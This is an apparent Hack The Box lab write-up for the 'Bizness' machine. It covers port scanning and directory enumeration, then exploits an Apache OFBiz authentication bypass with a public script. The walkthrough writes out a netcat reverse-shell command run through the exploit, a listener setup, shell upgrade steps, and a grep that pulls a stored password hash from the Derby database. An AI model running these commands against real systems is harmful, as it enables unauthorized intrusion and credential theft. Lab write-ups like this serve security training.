Bizness

July 9, 20251,390 words

Initial Reconnaissance: Nmap Scan

Our initial intel gathering begins with a nmap scan targeting the machine's IP address (10.10.11.252). This scan helps us identify open ports and services running on the system.

$ sudo nmap -sS -sV -sC 10.10.11.252 -oN nmap/first-scan

Scan Results:

The scan reveals the following open ports:

  • Port 22 (TCP): This is the standard port for SSH (Secure Shell) connections, which allows remote login with encryption.

  • Port 80 (TCP): This is the standard port for HTTP (Hypertext Transfer Protocol), the foundation of web traffic. An open port 80 suggests a web server is present.

  • Port 443 (TCP): This is the standard port for HTTPS (Hypertext Transfer Protocol Secure), the encrypted version of HTTP. The presence of port 443 indicates a web server running with encryption

Bypassing DNS with /etc/hosts

We've encountered a situation where directly accessing the target machine's web server using its IP address (10.10.11.252) might be cumbersome. To simplify this process, we'll leverage a handy tool: the /etc/hosts file.

The /etc/hosts file acts as a local DNS lookup table. It allows your machine to map hostnames (like bizness.htb) to IP addresses (like 10.10.11.252) without relying on external DNS servers. This approach offers a couple of advantages:

  • Convenience: We can use the more memorable hostname bizness.htb instead of the numerical IP address when accessing the web server.

  • Efficiency: Bypassing the DNS lookup process can potentially speed up our browsing experience, especially if the external DNS server is slow or unavailable.

[!Note]

in this case this is only so that we can view the website as the domain is not registered with a DNS server

Adding the Entry:

(Assuming you've already added the entry) Great! The image confirms that you've successfully added a line to your /etc/hosts file. This line likely resembles:

$ 10.10.11.252 bizness.htb

This simple line instructs your machine to translate any attempt to access bizness.htb in your web browser to the IP address 10.10.11.252.

Next Steps:

With this configuration in place, you can now fire up your web browser and navigate to https://bizness.htb.

This will directly connect you to the web server running on the target machine, allowing you to proceed with your exploration of the Hack The Box (HTB) box.

Web Page Exploration and Directory Enumeration

**Having modified our /etc/hosts file, we can now conveniently access the target machine's web server by navigating to https://bizness.htb

in our web browser. Examining the website, we find limited interactivity, suggesting potential client-side rendering or a static website.**

Next Steps:

Since the initial web page doesn't offer much in terms of user input or hidden functionalities, we'll shift our focus to directory enumeration. This technique aims to identify hidden or unlinked directories on the web server that might contain sensitive information.

Directory Enumeration Reveals OFBiz Logins

We've now explored the initial web page at https://bizness.htb

and discovered it offers limited interaction. To delve deeper, we employed a directory enumeration tool, likely Dirb.

Dirb successfully identified several directories on the target web server, including:

  • /accounting/

  • /ap/ (accounts payable)

  • /ar/ (accounts receivable)

  • Potentially more directories (depending on the output)

Interestingly, accessing some of these directories led to OFBiz login pages. OFBiz (Open For Business) is an open-source enterprise resource planning (ERP) software suite.

Looking closer at the login page, we noticed a version number listed in the bottom left corner. With some quick research on this specific OFBIZ version, we discovered a critical vulnerability (CVE-2023-51467 and CVE-2023-49070) reported very recently. This vulnerability allows attackers to bypass authentication and potentially gain unauthorized access to the system, even allowing for a reverse shell!

Exploiting the OFBIZ Vulnerability (CVE-2023-51467 & CVE-2023-49070)

Exploiting the OFBIZ Vulnerability

While we won't delve into the specifics of exploiting vulnerabilities, publicly available resources often contain tools or code related to known weaknesses. In this case, after finding a repository containing exploit code for the identified OFBIZ vulnerability (CVE-2023-51467 and CVE-2023-49070), we could potentially use it to assess the target's susceptibility.

python exploit.py --url https://bizness.htb

[+] Scanning started ...

[+] Apache OFBiz instance seems to be vulnerable.

The outcome indicates that the target system is indeed vulnerable. This finding presents an opportunity to further investigate potential weaknesses, but it's crucial to remember that such actions should only be conducted in controlled environments with proper authorization, following ethical hacking practices.

Successfully Establishing a Connection

  1. Listener Setup: Open a terminal and set up a listener with Netcat:
   nc -nvlp [port number]

Replace [port number] with your chosen port.

  1. Exploit Execution: In another terminal, navigate to the exploit directory and execute it:
   python exploit.py --url https://bizness.htb

 --cmd 'nc [your_ip] [port number] -c bash'

Customize [your_ip] with your IP address and [port number] with the listener port.

  1. Shell Access: Upon successful execution, you’ll establish a reverse shell connection to your listener. Congratulations! You now have remote access to the target system.

  2. Exploration: With shell access, explore the target system cautiously and execute commands as needed for analysis and exploitation.

Improving Shell Efficiency

Before pursuing the flag, let's enhance our shell for better interaction. I prefer using Python for this, but there are multiple methods you can explore. Here's one way:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Next, we'll send the shell to the background using Ctrl+Z and run:

stty raw -echo; fg

Now, define our Terminal emulator with:

export TERM=xterm

With these adjustments, our shell becomes more responsive, allowing for easier navigation and command recall.

User flag

Let's search for the user flag. Typically, it's located in the home directory, making it easy to find. Let's check:

we can do this by listing the home directory with 

ofbiz@bizness:/opt/ofbiz$ ls ~/

user.txt

And there you have it—the user flag is right there, waiting to be discovered.

Privilege Escalation

I examined the system using Linpeas and tried several kernel privilege escalation exploits, but didn't have any luck. After some online research, I couldn't find a solution, so I turned to other resources about this box. According to the write-up I found at https://techyrick.com/bizness-hackthebox-writeup/

To escalate your privileges, you need to search through the OFBiz folder where you've landed the shell and find a user password, which is stored in SHA1. There's no easy shortcut—you just have to get familiar with OFBiz.

to find the SHA1 hash, you can use the below command after navigating to the derby database directory.

cd /opt/ofbiz/runtime/data/derby/ofbiz/seg0/

grep -arin -o -E '(\w+\w){0,5}password(\W+\w){0,5}' .

Let's break down the command:

  1. grep: This is the command-line utility used for searching text patterns in files.

  2. -a: This flag tells grep to treat binary files as text files, allowing it to search through them.

  3. -r: This flag stands for "recursive", meaning it will search through all files and directories recursively, starting from the current directory (.).

  4. -i: This flag makes the search case-insensitive, so it will match "password", "Password", "PASSWORD", etc.

  5. -n: This flag tells grep to print the line numbers of matching lines along with the lines themselves.

  6. -o: This flag instructs grep to only print the matched parts of a line, rather than the entire line.

  7. -E: This flag enables extended regular expressions, allowing for more complex patterns to be searched.

  8. '(\w+\w){0,5}password(\W+\w){0,5}': This is the pattern we're searching for. Let's break it down further:

  • (\w+\w): This part matches one or more word characters (alphanumeric characters plus underscore), repeated twice. This allows for matching words like "admin123" or "user_567".

  • {0,5}: This quantifier specifies that the preceding pattern should be repeated between 0 and 5 times. So, (pattern){0,5} matches from 0 to 5 occurrences of the pattern.

  • password: This is the literal string "password" that we're searching for.

  • (\W+\w): This part matches one or more non-word characters (anything other than alphanumeric characters or underscore) followed by one or more word characters, repeated once. This allows for matching strings like "password123!" or "password_abc".

  • {0,5}: Similar to before, this quantifier specifies that the preceding pattern should be repeated between 0 and 5 times.

  1. .: This specifies the directory to search in. In this case, it's the current directory (.).

and if we look through the file, we can see below:

./c54d0.dat:21:password="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled